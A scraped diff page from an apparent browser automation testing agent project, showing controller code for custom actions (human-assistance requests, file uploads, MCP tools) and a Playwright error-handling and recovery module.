[str, BrowserContext], Awaitable[Dict[str, Any]]]]] = None,
|
| 55 |
+
):
|
| 56 |
+
super().__init__(exclude_actions=exclude_actions, output_model=output_model)
|
| 57 |
+
self._register_custom_actions()
|
| 58 |
+
self.ask_assistant_callback = ask_assistant_callback
|
| 59 |
+
self.mcp_client = None
|
| 60 |
+
self.mcp_server_config = None
|
| 61 |
+
|
| 62 |
+
def _register_custom_actions(self):
|
| 63 |
+
"""Register all custom browser actions"""
|
| 64 |
+
|
| 65 |
+
@self.registry.action(
|
| 66 |
+
"When executing tasks, prioritize autonomous completion. However, if you encounter a definitive blocker "
|
| 67 |
+
"that prevents you from proceeding independently – such as needing credentials you don't possess, "
|
| 68 |
+
"requiring subjective human judgment, needing a physical action performed, encountering complex CAPTCHAs, "
|
| 69 |
+
"or facing limitations in your capabilities – you must request human assistance."
|
| 70 |
+
)
|
| 71 |
+
async def ask_for_assistant(query: str, browser: BrowserContext):
|
| 72 |
+
if self.ask_assistant_callback:
|
| 73 |
+
if inspect.iscoroutinefunction(self.ask_assistant_callback):
|
| 74 |
+
user_response = await self.ask_assistant_callback(query, browser)
|
| 75 |
+
else:
|
| 76 |
+
user_response = self.ask_assistant_callback(query, browser)
|
| 77 |
+
msg = f"AI ask: {query}. User response: {user_response['response']}"
|
| 78 |
+
logger.info(msg)
|
| 79 |
+
return ActionResult(extracted_content=msg, include_in_memory=True)
|
| 80 |
+
else:
|
| 81 |
+
return ActionResult(extracted_content="Human cannot help you. Please try another way.",
|
| 82 |
+
include_in_memory=True)
|
| 83 |
+
|
| 84 |
+
@self.registry.action(
|
| 85 |
+
'Upload file to interactive element with file path ',
|
| 86 |
+
)
|
| 87 |
+
async def upload_file(index: int, path: str, browser: BrowserContext, available_file_paths: list[str]):
|
| 88 |
+
if path not in available_file_paths:
|
| 89 |
+
return ActionResult(error=f'File path {path} is not available')
|
| 90 |
+
|
| 91 |
+
if not os.path.exists(path):
|
| 92 |
+
return ActionResult(error=f'File {path} does not exist')
|
| 93 |
+
|
| 94 |
+
dom_el = await browser.get_dom_element_by_index(index)
|
| 95 |
+
|
| 96 |
+
file_upload_dom_el = dom_el.get_file_upload_element()
|
| 97 |
+
|
| 98 |
+
if file_upload_dom_el is None:
|
| 99 |
+
msg = f'No file upload element found at index {index}'
|
| 100 |
+
logger.info(msg)
|
| 101 |
+
return ActionResult(error=msg)
|
| 102 |
+
|
| 103 |
+
file_upload_el = await browser.get_locate_element(file_upload_dom_el)
|
| 104 |
+
|
| 105 |
+
if file_upload_el is None:
|
| 106 |
+
msg = f'No file upload element found at index {index}'
|
| 107 |
+
logger.info(msg)
|
| 108 |
+
return ActionResult(error=msg)
|
| 109 |
+
|
| 110 |
+
try:
|
| 111 |
+
await file_upload_el.set_input_files(path)
|
| 112 |
+
msg = f'Successfully uploaded file to index {index}'
|
| 113 |
+
logger.info(msg)
|
| 114 |
+
return ActionResult(extracted_content=msg, include_in_memory=True)
|
| 115 |
+
except Exception as e:
|
| 116 |
+
msg = f'Failed to upload file to index {index}: {str(e)}'
|
| 117 |
+
logger.info(msg)
|
| 118 |
+
return ActionResult(error=msg)
|
| 119 |
+
|
| 120 |
+
@time_execution_sync('--act')
|
| 121 |
+
async def act(
|
| 122 |
+
self,
|
| 123 |
+
action: ActionModel,
|
| 124 |
+
browser_context: Optional[BrowserContext] = None,
|
| 125 |
+
#
|
| 126 |
+
page_extraction_llm: Optional[BaseChatModel] = None,
|
| 127 |
+
sensitive_data: Optional[Dict[str, str]] = None,
|
| 128 |
+
available_file_paths: Optional[list[str]] = None,
|
| 129 |
+
#
|
| 130 |
+
context: Context | None = None,
|
| 131 |
+
) -> ActionResult:
|
| 132 |
+
"""Execute an action"""
|
| 133 |
+
|
| 134 |
+
try:
|
| 135 |
+
for action_name, params in action.model_dump(exclude_unset=True).items():
|
| 136 |
+
if params is not None:
|
| 137 |
+
if action_name.startswith("mcp"):
|
| 138 |
+
# this is a mcp tool
|
| 139 |
+
logger.debug(f"Invoke MCP tool: {action_name}")
|
| 140 |
+
mcp_tool = self.registry.registry.actions.get(action_name).function
|
| 141 |
+
result = await mcp_tool.ainvoke(params)
|
| 142 |
+
else:
|
| 143 |
+
result = await self.registry.execute_action(
|
| 144 |
+
action_name,
|
| 145 |
+
params,
|
| 146 |
+
browser=browser_context,
|
| 147 |
+
page_extraction_llm=page_extraction_llm,
|
| 148 |
+
sensitive_data=sensitive_data,
|
| 149 |
+
available_file_paths=available_file_paths,
|
| 150 |
+
context=context,
|
| 151 |
+
)
|
| 152 |
+
|
| 153 |
+
if isinstance(result, str):
|
| 154 |
+
return ActionResult(extracted_content=result)
|
| 155 |
+
elif isinstance(result, ActionResult):
|
| 156 |
+
return result
|
| 157 |
+
elif result is None:
|
| 158 |
+
return ActionResult()
|
| 159 |
+
else:
|
| 160 |
+
raise ValueError(f'Invalid action result type: {type(result)} of {result}')
|
| 161 |
+
return ActionResult()
|
| 162 |
+
except Exception as e:
|
| 163 |
+
raise e
|
| 164 |
+
|
| 165 |
+
async def setup_mcp_client(self, mcp_server_config: Optional[Dict[str, Any]] = None):
|
| 166 |
+
self.mcp_server_config = mcp_server_config
|
| 167 |
+
if self.mcp_server_config:
|
| 168 |
+
self.mcp_client = await setup_mcp_client_and_tools(self.mcp_server_config)
|
| 169 |
+
self.register_mcp_tools()
|
| 170 |
+
|
| 171 |
+
def register_mcp_tools(self):
|
| 172 |
+
"""
|
| 173 |
+
Register the MCP tools used by this controller.
|
| 174 |
+
"""
|
| 175 |
+
if self.mcp_client:
|
| 176 |
+
for server_name in self.mcp_client.server_name_to_tools:
|
| 177 |
+
for tool in self.mcp_client.server_name_to_tools[server_name]:
|
| 178 |
+
tool_name = f"mcp.{server_name}.{tool.name}"
|
| 179 |
+
self.registry.registry.actions[tool_name] = RegisteredAction(
|
| 180 |
+
name=tool_name,
|
| 181 |
+
description=tool.description,
|
| 182 |
+
function=tool,
|
| 183 |
+
param_model=create_tool_param_model(tool),
|
| 184 |
+
)
|
| 185 |
+
logger.info(f"Add mcp tool: {tool_name}")
|
| 186 |
+
logger.debug(
|
| 187 |
+
f"Registered {len(self.mcp_client.server_name_to_tools[server_name])} mcp tools for {server_name}")
|
| 188 |
+
else:
|
| 189 |
+
logger.warning(f"MCP client not started.")
|
| 190 |
+
|
| 191 |
+
async def close_mcp_client(self):
    """Tear down the MCP client session opened by ``setup_mcp_client``, if any."""
    client = self.mcp_client
    if not client:
        return
    # The client is an async context manager; exit it without an exception.
    await client.__aexit__(None, None, None)
|
src/utils/__init__.py
ADDED
|
File without changes
|
src/utils/advanced_error_handler.py
ADDED
|
@@ -0,0 +1,450 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| 1 |
+
"""
|
| 2 |
+
🤖 Fagun Browser Automation Testing Agent - Advanced Error Handler
|
| 3 |
+
=================================================================
|
| 4 |
+
|
| 5 |
+
Advanced error handling, debugging, and intelligent error recovery system.
|
| 6 |
+
|
| 7 |
+
Author: Mejbaur Bahar Fagun
|
| 8 |
+
Role: Software Engineer in Test
|
| 9 |
+
LinkedIn: https://www.linkedin.com/in/mejbaur/
|
| 10 |
+
"""
|
| 11 |
+
|
| 12 |
+
import asyncio
|
| 13 |
+
import logging
|
| 14 |
+
import traceback
|
| 15 |
+
import json
|
| 16 |
+
from typing import Dict, List, Optional, Any, Tuple
|
| 17 |
+
from dataclasses import dataclass
|
| 18 |
+
from datetime import datetime
|
| 19 |
+
from playwright.async_api import Page, Locator, Error as PlaywrightError
|
| 20 |
+
|
| 21 |
+
logger = logging.getLogger(__name__)
|
| 22 |
+
|
| 23 |
+
@dataclass
class DetailedError:
    """Detailed error information with context.

    Snapshot of one failed browser action: the raw exception data plus the
    element/page/action context captured at failure time, and the handler's
    derived severity and human-readable fix suggestions.
    """
    error_type: str  # exception class name, e.g. "TimeoutError"
    error_message: str  # str(exception) at the time of failure
    element_info: Dict[str, Any]  # element details: index, selector, visibility, attributes, ...
    page_context: Dict[str, Any]  # page snapshot: url, title, element counts, viewport, ...
    action_context: Dict[str, Any]  # the attempted action, its target and input value
    suggested_fix: str  # newline-joined suggestions from the analyzer
    severity: str  # low, medium, high, critical
    timestamp: datetime  # when the error was recorded (datetime.now())
    stack_trace: str  # traceback.format_exc() captured at failure time
|
| 35 |
+
|
| 36 |
+
class AdvancedErrorHandler:
    """Advanced error handling and debugging system.

    Collects rich context (element, page, action) for every failed browser
    action, derives a severity and human-readable fix suggestions, records the
    error, and offers a small set of bounded automatic recovery strategies.
    """

    def __init__(self, page: Page):
        # Playwright page the handler inspects when an action fails.
        self.page = page
        # Every error recorded by handle_action_error, oldest first.
        self.error_history: List[DetailedError] = []
        # Per "(error_type)_(action)" counter used to cap automatic recoveries.
        self.recovery_attempts: Dict[str, int] = {}

    async def handle_action_error(self, error: Exception, action: str,
                                  element_index: Optional[int] = None,
                                  element_selector: Optional[str] = None,
                                  input_value: Optional[str] = None) -> DetailedError:
        """Build, record and log a DetailedError for a failed action.

        Gathers element/page/action context, analyzes the exception for a
        severity and fix suggestions, appends the result to ``error_history``
        and logs it before returning it to the caller.
        """
        # Extract element information (best effort; never raises).
        element_info = await self._extract_element_info(element_index, element_selector)

        # Extract page context (best effort; never raises).
        page_context = await self._extract_page_context()

        # Record exactly what was attempted.
        action_context = {
            "action": action,
            "element_index": element_index,
            "element_selector": element_selector,
            "input_value": input_value,
            "timestamp": datetime.now().isoformat()
        }

        # Analyze error and generate suggestions.
        error_analysis = self._analyze_error(error, element_info, page_context, action_context)

        detailed_error = DetailedError(
            error_type=type(error).__name__,
            error_message=str(error),
            element_info=element_info,
            page_context=page_context,
            action_context=action_context,
            suggested_fix=error_analysis["suggested_fix"],
            severity=error_analysis["severity"],
            timestamp=datetime.now(),
            stack_trace=traceback.format_exc()
        )

        self.error_history.append(detailed_error)
        self._log_detailed_error(detailed_error)

        return detailed_error

    async def _extract_element_info(self, element_index: Optional[int],
                                    element_selector: Optional[str]) -> Dict[str, Any]:
        """Extract detailed information about the element that caused the error.

        Resolves the element either by its position among the page's
        interactive elements (``element_index``) or by ``element_selector``.
        Never raises; failures are reported via the ``extraction_error`` key.
        """
        element_info = {
            "index": element_index,
            "selector": element_selector,
            "exists": False,
            "visible": False,
            "enabled": False,
            "tag_name": None,
            "attributes": {},
            "text_content": None,
            "bounding_box": None,
            "similar_elements": []
        }

        try:
            if element_index is not None:
                # Index is interpreted against this fixed interactive-element set;
                # recovery helpers must use the same selector to stay aligned.
                elements = await self.page.locator("input, button, select, textarea").all()
                if 0 <= element_index < len(elements):
                    element = elements[element_index]
                    element_info.update(await self._get_element_details(element))
                    element_info["similar_elements"] = await self._find_similar_elements(element)

            elif element_selector:
                element = self.page.locator(element_selector).first
                if await element.count() > 0:
                    element_info.update(await self._get_element_details(element))
                    element_info["similar_elements"] = await self._find_similar_elements(element)

        except Exception as e:
            element_info["extraction_error"] = str(e)

        return element_info

    async def _get_element_details(self, element: Locator) -> Dict[str, Any]:
        """Return existence, visibility, tag, text, attributes and bbox of *element*.

        Best effort: any failure is reported under the ``error`` key instead of
        propagating.
        """
        details = {}

        try:
            details["exists"] = await element.count() > 0
            if details["exists"]:
                details["visible"] = await element.is_visible()
                details["enabled"] = await element.is_enabled()
                details["tag_name"] = await element.evaluate("el => el.tagName")
                details["text_content"] = await element.text_content()

                # Collect all DOM attributes as a plain dict.
                attributes = await element.evaluate("el => { const attrs = {}; for (let attr of el.attributes) { attrs[attr.name] = attr.value; } return attrs; }")
                details["attributes"] = attributes

                # bounding_box() can fail for detached/hidden elements; treat as absent.
                try:
                    bbox = await element.bounding_box()
                    details["bounding_box"] = bbox
                except Exception:  # was a bare except; keep best-effort semantics
                    details["bounding_box"] = None

        except Exception as e:
            details["error"] = str(e)

        return details

    async def _find_similar_elements(self, target_element: Locator) -> List[Dict[str, Any]]:
        """List up to 10 interactive elements on the page as alternatives.

        Note: the result currently describes *all* interactive elements, not
        ones filtered by similarity to ``target_element``.
        """
        similar_elements = []

        try:
            all_elements = await self.page.locator("input, button, select, textarea, a").all()

            for i, element in enumerate(all_elements):
                try:
                    element_details = await self._get_element_details(element)
                    if element_details.get("exists"):
                        similar_elements.append({
                            "index": i,
                            "tag_name": element_details.get("tag_name"),
                            "attributes": element_details.get("attributes", {}),
                            "text_content": element_details.get("text_content"),
                            "visible": element_details.get("visible", False)
                        })
                except Exception:  # skip individual elements that cannot be inspected
                    continue

        except Exception as e:
            # Preserve the original behavior of surfacing the failure in-band.
            similar_elements.append({"error": str(e)})

        return similar_elements[:10]  # Limit to 10 similar elements

    async def _extract_page_context(self) -> Dict[str, Any]:
        """Snapshot the current page: url, title, element counts, viewport, UA.

        Best effort: failures are reported via the ``extraction_error`` key.
        """
        context = {
            "url": None,
            "title": None,
            "form_count": 0,
            "input_count": 0,
            "button_count": 0,
            "page_loaded": False,
            "viewport_size": None,
            "user_agent": None
        }

        try:
            context["url"] = self.page.url
            context["title"] = await self.page.title()
            context["form_count"] = await self.page.locator("form").count()
            context["input_count"] = await self.page.locator("input").count()
            context["button_count"] = await self.page.locator("button").count()
            context["page_loaded"] = True

            # Bug fix: in the async API, Page.viewport_size is a property, not
            # an awaitable method — `await self.page.viewport_size()` raised.
            viewport = self.page.viewport_size
            if viewport:
                context["viewport_size"] = f"{viewport['width']}x{viewport['height']}"

            context["user_agent"] = await self.page.evaluate("navigator.userAgent")

        except Exception as e:
            context["extraction_error"] = str(e)

        return context

    def _analyze_error(self, error: Exception, element_info: Dict[str, Any],
                       page_context: Dict[str, Any], action_context: Dict[str, Any]) -> Dict[str, Any]:
        """Classify *error* and return ``{"severity": ..., "suggested_fix": ...}``."""
        error_message = str(error).lower()
        error_type = type(error).__name__

        # Severity is keyword-driven; "critical" only for permission/blocked.
        severity = "medium"
        if "timeout" in error_message or "waiting" in error_message:
            severity = "high"
        elif "not found" in error_message or "not visible" in error_message:
            severity = "high"
        elif "permission" in error_message or "blocked" in error_message:
            severity = "critical"
        elif "network" in error_message or "connection" in error_message:
            severity = "high"

        suggested_fix = self._generate_suggestions(error_message, error_type, element_info, page_context, action_context)

        return {
            "severity": severity,
            "suggested_fix": suggested_fix
        }

    def _generate_suggestions(self, error_message: str, error_type: str,
                              element_info: Dict[str, Any], page_context: Dict[str, Any],
                              action_context: Dict[str, Any]) -> str:
        """Build a newline-joined, human-readable list of fix suggestions."""
        suggestions = []

        # Element not found errors
        if "not found" in error_message or "no element" in error_message:
            suggestions.append("🔍 Element not found. Try these solutions:")
            suggestions.append("   • Wait for the page to fully load")
            suggestions.append("   • Check if the element selector is correct")
            suggestions.append("   • Verify the element exists on the current page")

            if element_info.get("similar_elements"):
                suggestions.append("   • Similar elements found on page:")
                for elem in element_info["similar_elements"][:3]:
                    if elem.get("tag_name"):
                        # Bug fix: text_content may be present but None, which
                        # the original sliced directly (TypeError).
                        text = elem.get("text_content") or "No text"
                        suggestions.append(f"     - {elem['tag_name']}: {text[:50]}")

        # Element not visible errors
        elif "not visible" in error_message or "not attached" in error_message:
            suggestions.append("👁️ Element not visible. Try these solutions:")
            suggestions.append("   • Scroll to the element first")
            suggestions.append("   • Wait for animations to complete")
            suggestions.append("   • Check if element is hidden by CSS")
            suggestions.append("   • Try clicking a parent element first")

        # Input text errors
        elif "input text" in error_message or "failed to input" in error_message:
            suggestions.append("⌨️ Input text failed. Try these solutions:")
            suggestions.append("   • Clear the field first")
            suggestions.append("   • Check if the field is enabled")
            suggestions.append("   • Verify the field accepts text input")
            suggestions.append("   • Try typing character by character")

            if action_context.get("input_value"):
                suggestions.append(f"   • Input value was: '{action_context['input_value']}'")

        # Click errors
        elif "click" in error_message or "failed to click" in error_message:
            suggestions.append("🖱️ Click failed. Try these solutions:")
            suggestions.append("   • Wait for element to be clickable")
            suggestions.append("   • Check if element is covered by another element")
            suggestions.append("   • Try force clicking")
            suggestions.append("   • Scroll to element before clicking")

        # Timeout errors
        elif "timeout" in error_message or "waiting" in error_message:
            suggestions.append("⏰ Timeout occurred. Try these solutions:")
            suggestions.append("   • Increase wait timeout")
            suggestions.append("   • Check if page is still loading")
            suggestions.append("   • Verify network connection")
            suggestions.append("   • Try refreshing the page")

        # Network errors
        elif "network" in error_message or "connection" in error_message:
            suggestions.append("🌐 Network error. Try these solutions:")
            suggestions.append("   • Check internet connection")
            suggestions.append("   • Verify the website is accessible")
            suggestions.append("   • Try again in a few moments")
            suggestions.append("   • Check for firewall/proxy issues")

        # Generic suggestions
        if not suggestions:
            suggestions.append("🔧 General troubleshooting:")
            suggestions.append("   • Refresh the page and try again")
            suggestions.append("   • Check browser console for errors")
            suggestions.append("   • Verify the website is working properly")
            suggestions.append("   • Try a different approach or element")

        # Add context-specific suggestions
        if element_info.get("index") is not None:
            suggestions.append(f"   • Element index: {element_info['index']}")

        if page_context.get("input_count", 0) > 0:
            suggestions.append(f"   • Page has {page_context['input_count']} input elements")

        return "\n".join(suggestions)

    def _log_detailed_error(self, error: DetailedError):
        """Log the full error report; include the stack trace for high/critical."""
        # Plain string: the original used an f-string with no placeholders.
        logger.error("🚨 Detailed Error Report:")
        logger.error(f"   Type: {error.error_type}")
        logger.error(f"   Message: {error.error_message}")
        logger.error(f"   Severity: {error.severity}")
        logger.error(f"   Element Index: {error.element_info.get('index', 'N/A')}")
        logger.error(f"   Element Selector: {error.element_info.get('selector', 'N/A')}")
        logger.error(f"   Element Exists: {error.element_info.get('exists', 'N/A')}")
        logger.error(f"   Element Visible: {error.element_info.get('visible', 'N/A')}")
        logger.error(f"   Page URL: {error.page_context.get('url', 'N/A')}")
        logger.error(f"   Page Title: {error.page_context.get('title', 'N/A')}")
        logger.error(f"   Suggested Fix:\n{error.suggested_fix}")

        if error.severity in ["high", "critical"]:
            logger.error(f"   Stack Trace:\n{error.stack_trace}")

    async def attempt_error_recovery(self, error: DetailedError) -> bool:
        """Try an automatic recovery strategy for *error*; return success.

        At most 3 attempts are made per (error type, action) combination.
        """
        recovery_key = f"{error.error_type}_{error.action_context.get('action', 'unknown')}"

        if self.recovery_attempts.get(recovery_key, 0) >= 3:
            logger.warning(f"⚠️ Maximum recovery attempts reached for {recovery_key}")
            return False

        self.recovery_attempts[recovery_key] = self.recovery_attempts.get(recovery_key, 0) + 1

        try:
            # Dispatch to the recovery strategy matching the error message.
            if "not found" in error.error_message.lower():
                return await self._recover_element_not_found(error)
            elif "not visible" in error.error_message.lower():
                return await self._recover_element_not_visible(error)
            elif "input text" in error.error_message.lower():
                return await self._recover_input_text_error(error)
            elif "timeout" in error.error_message.lower():
                return await self._recover_timeout_error(error)

        except Exception as recovery_error:
            logger.error(f"❌ Recovery attempt failed: {recovery_error}")

        return False

    async def _recover_element_not_found(self, error: DetailedError) -> bool:
        """Wait briefly for dynamic content, then check for a visible alternative."""
        try:
            await asyncio.sleep(2)

            if error.element_info.get("similar_elements"):
                for elem in error.element_info["similar_elements"][:3]:
                    if elem.get("visible") and elem.get("tag_name"):
                        logger.info(f"🔄 Trying similar element: {elem['tag_name']}")
                        return True

            return False
        except Exception:
            return False

    async def _recover_element_not_visible(self, error: DetailedError) -> bool:
        """Scroll the offending element into view and report whether that worked."""
        try:
            if error.element_info.get("index") is not None:
                elements = await self.page.locator("input, button, select, textarea").all()
                if 0 <= error.element_info["index"] < len(elements):
                    await elements[error.element_info["index"]].scroll_into_view_if_needed()
                    await asyncio.sleep(1)
                    return True
            return False
        except Exception:
            return False

    async def _recover_input_text_error(self, error: DetailedError) -> bool:
        """Clear the target field so a retried input starts from a blank value."""
        try:
            if error.element_info.get("index") is not None:
                # Bug fix: indices are assigned over the full interactive-element
                # selector in _extract_element_info; the original used
                # "input, textarea" here, so the index pointed at the wrong node.
                elements = await self.page.locator("input, button, select, textarea").all()
                if 0 <= error.element_info["index"] < len(elements):
                    await elements[error.element_info["index"]].clear()
                    await asyncio.sleep(0.5)
                    return True
            return False
        except Exception:
            return False

    async def _recover_timeout_error(self, error: DetailedError) -> bool:
        """Give the page extra time to settle before a retry."""
        try:
            await asyncio.sleep(5)
            return True
        except Exception:
            return False

    def get_error_summary(self) -> Dict[str, Any]:
        """Aggregate ``error_history`` into counts plus the last five errors."""
        if not self.error_history:
            return {"message": "No errors recorded"}

        error_counts = {}
        severity_counts = {}

        for error in self.error_history:
            error_type = error.error_type
            severity = error.severity

            error_counts[error_type] = error_counts.get(error_type, 0) + 1
            severity_counts[severity] = severity_counts.get(severity, 0) + 1

        return {
            "total_errors": len(self.error_history),
            "error_types": error_counts,
            "severity_distribution": severity_counts,
            "recovery_attempts": self.recovery_attempts,
            "recent_errors": [
                {
                    "type": e.error_type,
                    "message": e.error_message,
                    "severity": e.severity,
                    "timestamp": e.timestamp.isoformat(),
                    "suggested_fix": e.suggested_fix
                }
                for e in self.error_history[-5:]  # Last 5 errors
            ]
        }
|
src/utils/advanced_testing.py
ADDED
|
@@ -0,0 +1,1015 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
